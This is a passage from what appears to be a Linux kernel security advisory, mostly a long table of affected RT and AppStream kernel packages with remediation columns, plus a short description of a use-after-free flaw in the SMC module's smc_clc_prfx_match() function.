| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the Linux kernel’s SMC (Shared Memory Communication) module: in smc_clc_prfx_match(), the function is called from smc_listen_work() without proper RCU or RTNL protection. The code previously used sk_dst_get(sk)->dev, which can lead to a use-after-free (UAF) condition if the sk’s destination is freed concurrently.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
